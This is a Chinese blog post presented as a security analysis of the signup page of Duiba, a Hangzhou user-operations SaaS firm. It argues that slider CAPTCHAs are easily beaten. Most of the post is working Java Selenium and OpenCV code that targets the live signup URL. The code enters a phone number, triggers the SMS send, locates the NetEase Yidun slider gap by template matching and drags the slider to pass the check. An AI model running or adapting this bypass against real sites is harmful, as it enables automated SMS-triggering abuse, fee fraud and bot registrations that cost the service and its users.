注册安全分析报告:兑吧

于 2024-10-10 18:09:18 发布
阅读量410 收藏 9
点赞数 4
分类专栏: 交互验证测评系列 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Explinks/article/details/142828735
版权

前言

由于网站注册入口容易被黑客攻击,存在如下安全问题:

  1. 暴力破解密码,造成用户信息泄露
  2. 短信盗刷的安全问题,影响业务及导致用户投诉
  3. 带来经济损失,尤其是后付费客户,风险巨大,造成亏损无底洞
    在这里插入图片描述

所以大部分网站及App 都采取图形验证码或滑动验证码等交互解决方案, 但在机器学习能力提高的当下,连百度这样的大厂都遭受攻击导致点名批评, 图形验证及交互验证方式的安全性到底如何? 请看具体分析

一、 兑吧 PC端注册入口

简介:杭州兑吧网络科技有限公司成立于2014年,专项负责兑吧用户运营SaaS平台, 旨在通过多样化的用户运营工具,
为应用开发者及线下企业,提供全周期的用户运营服务,帮助其提升用户的在线留存及活跃度。

在这里插入图片描述

二、 安全性分析报告:
采用网易的滑动行为验证方式,容易被模拟器绕过甚至逆向后暴力攻击,滑动拼图识别率在 95% 以上。

在这里插入图片描述

三、 测试方法:
前端界面分析为网易易盾的滑动验证码, 网上有大量现成的逆向文章及视频参考,不过我们这次不用逆向, 只是采用模拟器的方式,关键点主要模拟器交互、距离识别和轨道算法3部分
在这里插入图片描述

  1. 模拟器交互部分

private final String INDEX_URL = "http://hd.dlp.duiba.com.cn/login#!/login/signUp";

	@Override
	public RetEntity send(WebDriver driver, String areaCode, String phone) {
		try {
			RetEntity retEntity = new RetEntity();
			driver.get(INDEX_URL);

			// 输入手机号
			WebElement phoneElemet = ChromeDriverManager.waitElement(driver, By.className("fir-ipt"), 500);
			phoneElemet.sendKeys(phone);
			Thread.sleep(1000);
			WebElement sendElement = driver.findElement(By.className("verification-code"));
			sendElement.click();
			Thread.sleep(500);

			netEasy.moveExec(driver);

			Thread.sleep(1000);
			WebElement reSendElement = ChromeDriverManager.waitElement(driver, By.className("resend-time"), 10);
			String info = (reSendElement != null) ? reSendElement.getText() : null;
			retEntity.setMsg(info);
			if (info != null && info.contains("后重新发送")) {
				retEntity.setRet(0);
			} else {
				System.out.println("info=" + info);
			}
			return retEntity;
		} catch (Exception e) {
			System.out.println("send() phone=" + phone + ",e=" + e.toString());
			StringBuffer er = new StringBuffer("send() " + e.toString() + "\n");
			for (StackTraceElement elment : e.getStackTrace())
				er.append(elment.toString() + "\n");
			System.out.println(er.toString());
			return null;
		} finally {
			driver.manage().deleteAllCookies();
		}
	}

2. 距离识别


/**
	 * Open Cv 图片模板匹配
	 * 
	 * @param tpPath
	 *            模板图片路径
	 * @param bgPath
	 *            目标图片路径
	 * @return { width, maxX }
	 */
	public String[] getWidth(String tpPath, String bgPath, String resultFile) {
		try {
			Rect rectCrop = clearWhite(tpPath);
			Mat g_tem = Imgcodecs.imread(tpPath);
			Mat clearMat = g_tem.submat(rectCrop);

			Mat cvt = new Mat();
			Imgproc.cvtColor(clearMat, cvt, Imgproc.COLOR_RGB2GRAY);
			Mat edgesSlide = new Mat();
			Imgproc.Canny(cvt, edgesSlide, threshold1, threshold2);
			Mat cvtSlide = new Mat();
			Imgproc.cvtColor(edgesSlide, cvtSlide, Imgproc.COLOR_GRAY2RGB);
			Imgcodecs.imwrite(tpPath, cvtSlide);

			Mat g_b = Imgcodecs.imread(bgPath);
			Mat edgesBg = new Mat();
			Imgproc.Canny(g_b, edgesBg, threshold1, threshold2);
			Mat cvtBg = new Mat();
			Imgproc.cvtColor(edgesBg, cvtBg, Imgproc.COLOR_GRAY2RGB);

			int result_rows = cvtBg.rows() - cvtSlide.rows() + 1;
			int result_cols = cvtBg.cols() - cvtSlide.cols() + 1;
			Mat g_result = new Mat(result_rows, result_cols, CvType.CV_32FC1);
			Imgproc.matchTemplate(cvtBg, cvtSlide, g_result, Imgproc.TM_CCOEFF_NORMED); // 归一化平方差匹配法
			// 归一化相关匹配法
			MinMaxLocResult minMaxLoc = Core.minMaxLoc(g_result);
			Point maxLoc = minMaxLoc.maxLoc;
			Imgproc.rectangle(cvtBg, maxLoc, new Point(maxLoc.x + cvtSlide.cols(), maxLoc.y + cvtSlide.rows()), new Scalar(0, 0, 255), 1);
			Imgcodecs.imwrite(resultFile, cvtBg);
			String width = String.valueOf(cvtSlide.cols());
			String maxX = String.valueOf(maxLoc.x + cvtSlide.cols());
			System.out.println("OpenCv2.getWidth() width=" + width + ",maxX=" + maxX);
			return new String[] { width, maxX };
		} catch (Throwable e) {
			System.out.println("getWidth() " + e.toString());
			logger.error("getWidth() " + e.toString());
			for (StackTraceElement elment : e.getStackTrace()) {
				logger.error(elment.toString());
			}
			return null;
		}
	}
  1. 轨道生成及移动算法

public boolean moveExec(WebDriver driver) {
		// 获取滑动按钮
		try {
			WebElement moveElemet = ChromeDriverManager.waitElement(driver, By.className("yidun_slider"), 400);
			if (moveElemet == null) {
				return false;
			} else {
				Actions actions = new Actions(driver);
				actions.clickAndHold(moveElemet).perform();
			}
			Thread.sleep(1000);

			// 获取带阴影的背景图

			WebElement bg = ChromeDriverManager.waitElement(driver, By.className("yidun_bg-img"), 400);
			String bUrl = bg.getAttribute("src");
			if (bUrl == null) {
				System.out.println("bUrl=" + bUrl);
				return false;
			}
			// 获取小图

			WebElement s = ChromeDriverManager.waitElement(driver, By.className("yidun_jigsaw"), 400);
			String sUrl = s.getAttribute("src");
			if (sUrl == null) {
				System.out.println("sUrl=" + sUrl);
				return false;
			}
			Map<String, String> outMap = getMoveDistance(bUrl, sUrl);
			String openWidth = outMap != null ? outMap.get("width") : null;
			String openDistance = outMap != null ? outMap.get("distance") : null;
			// 计算匹配到的位置
			int distance = (openWidth != null && openDistance != null) ? (int) (Double.parseDouble(openDistance) - Integer.parseInt(openWidth) + 2) : 0;
			System.out.println("getMoveDistance() distance=" + distance + "outMap=" + outMap);
			if (distance == 0) {
				System.out.println("err distance=" + distance + "|openWidth=" + openWidth + ",openDistance=" + openDistance);
				return false;
			}

			moveElemet.click();
			// 滑动
			ActionMove.move(driver, moveElemet, distance);
			String moveStr = null;
			WebElement yidunElement;
			for (int i = 0; i <= 40; i++) {
				yidunElement = ChromeDriverManager.waitElement(driver, By.className("yidun--light"), 400);
				moveStr = (moveStr != null) ? yidunElement.getAttribute("class") : null;
				if (moveStr != null && moveStr.contains("yidun--success")) {
					System.out.println("succ distance=" + distance);
					driver.findElement(By.id("nickname")).click();
					Thread.sleep(500);
					driver.findElements(By.className("sms-code")).get(1).click();
					Thread.sleep(500);
					break;
				}
				System.out.print(".");
				Thread.sleep(50);
			}
			return true;
		} catch (Exception e) {
			return false;
		}

	}
  1. OpenCv 轮廓匹配测试样例:
    在这里插入图片描述

四丶结语

杭州兑吧网络科技有限公司成立于2014年,专项负责兑吧用户运营SaaS平台, 采用的是通俗的滑动验证产品, 该产品稳定并且市场占有率很高, 在一定程度上提高了用户体验, 但安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全。

很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
比如:“ 需求这么赶,当然是先实现功能啊 ”,“ 业务量很小啦,系统就这么点人用,不怕的 ” , “ 我们怎么会被盯上呢,不可能的 ”等等。

有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。

博客
2024年AI办公工具API:高效办公的智能选择
11-13 636
​在2024年,AI技术已经深入到我们工作生活的方方面面,极大地提高了办公效率和质量。这些工具通过集成先进的算法和模型,使得日常任务自动化、数据分析智能化、内容创作高效化。本文将介绍2024年最受欢迎的AI办公工具API,它们正在重新定义现代工作方式。
博客
如何一步步获得文心一言API密钥
11-12 793
本文将详细介绍如何调用文心一言ERNIE4.0 API服务,包括获取 API 密钥的步骤、基础配置、API 调用示例及注意事项。
博客
国际商业货币汇率转换工具
11-11 533
随着全球贸易的增长,对货币转换 API 的需求大幅增加。企业在国际市场上进行买卖,需要在各种货币之间进行快速准确地转换。免费货币兑换 API 服务是为满足这一需求而开发的技术时代最快、最可靠的解决方案之一。那么,为什么全球企业如此需要这些 API呢?
博客
微博热搜榜数据获取策略全解析
11-06 640
​本文将深入解析如何使用八爪鱼采集器(Octoparse)来采集微博热搜榜的数据,并提供详细的实践指南。
博客
深度学习翻译API密钥获取方法:逐步指导
11-04 669
本文将指导你如何获取 Deepl 翻译 API 密钥,并进行初步的可用性测试,同时探讨在使用过程中需要考虑的其他关键因素。
博客
七种方法助你找到实用且免费的API服务
10-31 616
本文将深入探讨7种发现好用且免费的API的方法,帮助你轻松找到适合的API,并提升开发效率。
博客
2024年优秀的天气预测API
10-30 1018
无论您是在构建应用程序、将天气数据添加到您的软件平台,还是将数据嵌入到家庭助理中,您都可能正在寻找与免费天气 API 截然不同的功能。我们研究了 2024 年市场上所有顶级天气 API,以帮助您选择合适的 API 并更快地开始。
博客
五大SERP API,挑战谷歌搜索霸主地位
10-29 666
在这篇博文中,我将向你介绍五种不同的 API 和 SERP 搜刮工具,它们可以帮助你更快、更高效地从 Google 搜刮海量数据。
博客
REST APIs与微服务:关键差异
10-28 1164
在微服务领域,REST API 在促进模块化组件之间的通信方面发挥着至关重要的作用。然而,将 REST API 与微服务成功集成会带来一些挑战和注意事项,我们将在这篇博文中简要探讨。
博客
YAML格式校验API:免费工具的使用指南
10-24 793
本文将以YAML 转其它格式 API 服务为例,详细探讨如何利用此 API 进行格式校验及数据转换。通过实际操作,读者将能够提高数据处理的效率和准确性,进而优化开发流程,确保项目的顺利进行。
博客
注册安全分析报告:51CTO
10-24 548
51CTO 作为老牌的技术论坛,技术实力雄厚,但在验证产品方面,不是自己研发而是采用第三方的阿里的滑动条, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “
博客
短信验证安全分析报告:12321骚扰电话举报受理中心
10-23 419
12321网络不良与垃圾信息举报受理中心(以下简称"12321受理中心")为中国互联网协会受工业和信息化部委托设立的投诉受理机构。负责协助工业和信息化部承担关于互联网、移动电话网、固定电话网等各种形式信息通信网络及电信业务中不良与垃圾信息的投诉受理、线索转办及信息统计等工作。
博客
自动裁剪图像的智能方法:Smart Image Cropping API指南
10-22 808
在本文中,我们将探讨这些基于人工智能的工具如何帮助您节省时间并在工作中更具创造力。
博客
burp + ddddocr 加载验证码识别插件对登录页面进行爆破
10-22 742
本文主要是介绍在使用burp时,如何连接dddocr 解决获取验证码数据包。
博客
注册_登录安全分析报告:FESCO
10-21 265
简介:北京外企人力资源服务有限公司(简称FESCO),前身于1979年成立并派出第一名中国雇员,自此中国人力资源服务行业应运而生【1】。40多年来,FESCO从北京走向全国迈向海外,一直引领着中国人力资源行业的发展。作为专业的人力资源综合解决方案提供商,FESCO始终以温暖的服务与先进的技术,为各种组织和企业提供全方位人力资源解决方案,推动着中外企业在华业务的快速增长,帮助国内外人才不断提升价值。
博客
掌握免费API:高效获取与智能调用技巧
10-21 1586
在本文中,我们回顾了免费 API 的重要性以及“深度求索”的精神。从获取 API、调用基础,到进阶应用技巧和实际案例分析,全面展示了如何有效利用免费 API 提升开发效率。
博客
文案创作新思路:Python与文心一言API的完美结合
10-17 1399
我们将详细介绍什么是百度文心一言 API,如何找到它,以及如何利用 幂简集成 平台来访问这个强大的工具。
博客
注册安全分析报告:OnePlus(一加手机)
10-17 968
一加手机作为手机厂商,可谓是实力雄厚,但在验证产品方面,采用第三方的阿里的滑动条,技术人员可能意识到阿里的产品未必能防得住,增加了IP限制措施,比较特别的的地方是根据活动频次改变阿里的标签增加一定的破解难度, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
博客
注册_登录安全分析报告:宝马中国
10-16 823
宝马中国作为全世界最成功的汽车和摩托车制造商之一的宝马集团旗下公司, 其滑动验证码没有采用市场常用的几家, 有独特的地方, 背景图在被抠出后,并不是采用同行的常用的透明化保留原有图形样式,而是填充白色,所以滑块位置识别需要从背景图中提取, 这样让识别变得更简单,造成这中特点有两方面原因,1 直接填充白色背景的技术比透明度的方式更简单2 从报文看未获取轨迹数据, 显示验证方式中并未验证轨迹,只验证距离是否合适很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
博客
2024年顶级免费货币转换API推荐
10-16 1035
API可以帮助您节省时间和金钱,避免不必要的努力。同时,它也使您的业务更加高效。网上有很多解决方案可供选择。但哪个是最好的免费货币转换API?在本文中,您将找到2024年顶级货币转换API。让我们开始吧。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值